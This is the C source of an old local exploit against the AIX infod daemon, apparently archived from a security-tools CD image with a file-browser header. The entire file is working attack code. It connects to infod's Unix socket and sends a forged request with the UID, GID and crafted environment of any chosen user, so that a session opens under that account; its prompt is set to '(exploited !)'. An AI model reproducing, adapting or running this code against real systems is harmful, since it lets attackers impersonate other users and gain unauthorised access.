home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / aix / local / infod.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  4.3 KB  |  140 lines
  1.  
  2. #include <sys/types.h>
  3. #include <sys/socket.h>
  4. #include <sys/un.h>
  5. #include <netdb.h>
  6. #include <stdio.h>
  7. #include <stdlib.h>
  8. #include <pwd.h>
  9. #define TAILLE_BUFFER 2000
  10. #define SOCK_PATH "/tmp/.info-help"
  11. #define PWD "/tmp"
  12. #define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)"
  13. #define NOUSER "Use : infofun [login]"
  14. #define UNKNOWN "User does not exist !"
  15. #define OK "Waiting for magic window ... if you have problems check the xhost "
  16.  
  17. void send_environ(char *var,FILE *param)
  18. {
  19.   char tempo[TAILLE_BUFFER];
  20.   int taille;
  21.  
  22.   taille=strlen(var);
  23.   sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0);
  24.   fwrite(tempo,1,taille+4,param);
  25. }
  26.  
  27. main(int argc,char** argv)
  28. {
  29.   struct sockaddr_un sin,expediteur;
  30.   struct hostent *hp;
  31.   struct passwd *info;
  32.   int chaussette,taille_expediteur,port,taille_struct,taille_param;
  33.   char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur;
  34.   FILE *param;
  35.  
  36.   char *HOME,*LOGIN;
  37.   int UID,GID;
  38.   printf("\n\n%s\n\n",KOPY);
  39.   if (argc!=2)
  40.     {
  41.       printf("%s\n",NOUSER);
  42.       exit(1);
  43.     }
  44.   info=getpwnam(argv[1]);
  45.   if (!info)
  46.     {
  47.       printf("%s\n",UNKNOWN);
  48.       exit(1);
  49.     }
  50.   HOME=info->pw_dir;
  51.   LOGIN=info->pw_name;
  52.   UID=info->pw_uid;
  53.   GID=info->pw_gid;
  54.   param=fopen("/tmp/tempo.fun","wb");
  55.   chaussette=socket(AF_UNIX,SOCK_STREAM,0);
  56.   sin.sun_family=AF_UNIX;
  57.   strcpy(sin.sun_path,SOCK_PATH);
  58.   taille_struct=sizeof(struct sockaddr_un);
  59.   if (connect(chaussette,(struct sockaddr*)&sin,taille_struct)<0)
  60.     {
  61.       perror("connect");
  62.       exit(1);
  63.     }
  64.   sprintf(buffer,"%c%c%c%c%c%c",0,0,UID>>8,UID-((UID>>8)*256),0,0);
  65.   fwrite(buffer,1,6,param);
  66.   sprintf(buffer,"%c%c",GID>>8,GID-((GID>>8)*256));
  67.   fwrite(buffer,1,2,param);
  68.   bzero(buffer,TAILLE_BUFFER);
  69.   strcpy(buffer,getenv("DISPLAY"));
  70.   fwrite(buffer,1,259,param);
  71.   sprintf(buffer,"%c%c%c%c%c%c%c%c%c",1,67,0,0,0,0,0,0,0);
  72.   fwrite(buffer,1,9,param);
  73.   send_environ(HOME,param);
  74.   send_environ(LOGIN,param);
  75.   send_environ(LOGIN,param);
  76.   send_environ(PWD,param);
  77.   send_environ("/dev/null",param);
  78.   sprintf(buffer,"%c%c%c%c",23,0,0,0);
  79.   fwrite(buffer,1,4,param);
  80.   sprintf(buffer,"_=./startinfo");
  81.   send_environ(buffer,param);
  82.   sprintf(buffer,"TMPDIR=/tmp");
  83.   send_environ(buffer,param);
  84.   sprintf(buffer,"LANG=%s",getenv("LANG"));
  85.   send_environ(buffer,param);
  86.   sprintf(buffer,"LOGIN=%s",LOGIN);
  87.   send_environ(buffer,param);
  88.   sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH"));
  89.   send_environ(buffer,param);
  90.   sprintf(buffer,"PATH=%s",getenv("PATH"));
  91.   send_environ(buffer,param);
  92.   sprintf(buffer,"%s","EDITOR=emacs");
  93.   send_environ(buffer,param);
  94.   sprintf(buffer,"LOGNAME=%s",LOGIN);
  95.   send_environ(buffer,param);
  96.   sprintf(buffer,"MAIL=/usr/spool/mail/%s",LOGIN);
  97.   send_environ(buffer,param);
  98.   sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME"));
  99.   send_environ(buffer,param);
  100.   sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH"));
  101.   send_environ(buffer,param);
  102.   sprintf(buffer,"%s","PS1=(exploited !) ");
  103.   send_environ(buffer,param);
  104.   sprintf(buffer,"USER=%s",LOGIN);
  105.   send_environ(buffer,param);
  106.   sprintf(buffer,"AUTHSTATE=%s",getenv("AUTHSTATE"));
  107.   send_environ(buffer,param);
  108.   sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY"));
  109.   send_environ(buffer,param);
  110.   sprintf(buffer,"SHELL=%s",getenv("SHELL"));
  111.   send_environ(buffer,param);
  112.   sprintf(buffer,"%s","ODMDIR=/etc/objrepos");
  113.   send_environ(buffer,param);
  114.   sprintf(buffer,"HOME=%s",HOME);
  115.   send_environ(buffer,param);
  116.   sprintf(buffer,"%s","TERM=vt220");
  117.   send_environ(buffer,param);
  118.   sprintf(buffer,"%s","MAILMSG=[YOU HAVE NEW MAIL]");
  119.   send_environ(buffer,param);
  120.   sprintf(buffer,"PWD=%s",PWD);
  121.   send_environ(buffer,param);
  122.   sprintf(buffer,"%s","TZ=NFT-1");
  123.   send_environ(buffer,param);
  124.   sprintf(buffer,"%s","A__z=! LOGNAME");
  125.   send_environ(buffer,param);
  126.   sprintf(buffer,"%c%c%c%c",1,45,113,0);
  127.   fwrite(buffer,1,4,param);
  128.   fclose(param);
  129.   param=fopen("/tmp/tempo.fun","rb");
  130.   fseek(param,0,SEEK_END);
  131.   taille_param=ftell(param);
  132.   fseek(param,0,SEEK_SET);
  133.   fread(paramz,1,taille_param,param);
  134.   fclose(param);
  135.   unlink("/tmp/tempo.fun");
  136.   write(chaussette,paramz,taille_param);
  137.   printf("\n%s %s\n",OK,getenv("HOSTNAME"));
  138.   close(chaussette);
  139. }
  140. /*                    www.hack.co.za              [2000]*/